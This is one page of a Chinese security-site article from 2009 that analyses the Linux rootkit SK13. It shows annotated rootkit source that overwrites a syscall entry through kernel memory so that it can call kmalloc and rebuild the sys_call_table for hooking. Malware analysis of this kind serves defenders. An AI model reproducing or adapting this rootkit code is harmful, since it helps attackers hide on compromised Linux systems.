首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>病毒分析>文章内容
Linux后门系列--由浅入深sk13完全分析
来源:http://xsec.org 作者:wzt 发布时间:2009-05-04  

            不常用的系统调用
      */

       if (ERR(rkml(fd, &oldsys, sct + OURSYS * 4))) {
          printf("FUCK: Can't read syscall %d addr\n", OURSYS);
          close(fd);
          return 1;
       }

        /*
            用kmalloc的地址替换oldolduname的地址
        */

       wkml(fd, kmalloc, sct + OURSYS * 4);

        /*

            计算将要用kmalloc分配的内存大小,注意是在内核区域分配内存

            大小等于sk自身的长度+256个系统调用的地址+512个pid_struc个结构体的大小

            注意:sk13b将要把原来的sys_call_table的所有内容重新分配到即将开辟的内存
            中,hook系统时是hook新的sys_call_table数组的,并用新的sys_call_talbe的
            地址覆盖原来的sys_call_talbe地址

        */

       size = (ulong) kernel_end - (ulong) kernel_start
            + SCT_TABSIZE + PID_TABSIZE;

       printf("Z_Init: Allocating kernel-code memory...");

        /*

            调用kmalloc在内核区域中分配内存

            注意: 刚才已经把oldolduname的地址替换成kmalloc的地址了,只要调用oldolduname
            就可以调用kmalloc函数了

            补充:如何在应用程序中直接调用kmalloc

            sk在stuff.h中定义了类似如下的几个宏函数:

        #define syscall2(__type, __name, __t1, __t2)        \
           __type __name(__t1 __a1, __t2 __a2)    \
        {                    \
           ulong    __res;            \
           __asm__ volatile        \
           ("int    $0x80"            \
           : "=a" (__res)            \
           : "0" (__NR_##__name)        \
           rr("b", __a1)            \
           rr("c", __a2));        \
           return (__type) __res;        \
        }

        static inline syscall2(ulong, KMALLOC, ulong, ulong);被展开后就变为:

        static inline ulong KMALLOC(ulong __a1,ulong __a2)
        {
           ulong    __res;
           __asm__volatile
           ("int    $0x80"
           : "=a" (__res)
           " "0"(__NR_KMALLOC)
               rr("b", __a1)
共11页: 上一页 [1] [2] [3] 4 [5] [6] [7] [8] [9] [10] [11] 下一页
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·Word溢出Shellcode分析
·浅谈反病毒技术的前世今生
·Ie0dayCVE0806.c 变种网马样本分
·Web应用漏洞的大规模攻击案例分
·Ie0dayCVE0806网马样本分析
·Witty病毒通过ISS的防火墙产品和
·酷狗音乐首页隐蔽挂马详细分析+7
·Net-Worm.Win32.Dasher(黛蛇)蠕
·熊猫烧香病毒分析与解决方案
·卡巴斯基(AVP)内存驻留型病毒检
·104种木马手工清除方法
·avserve病毒初步分析
  相关文章
·Word溢出Shellcode分析
·酷狗音乐首页隐蔽挂马详细分析+7
·熊猫烧香病毒分析与解决方案
·Ie0dayCVE0806网马样本分析
·Ie0dayCVE0806.c 变种网马样本分
·卡巴斯基(AVP)内存驻留型病毒检
·Net-Worm.Win32.Dasher(黛蛇)蠕
·浅谈反病毒技术的前世今生
·avserve病毒初步分析
·Witty病毒通过ISS的防火墙产品和
·104种木马手工清除方法
·Web应用漏洞的大规模攻击案例分
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved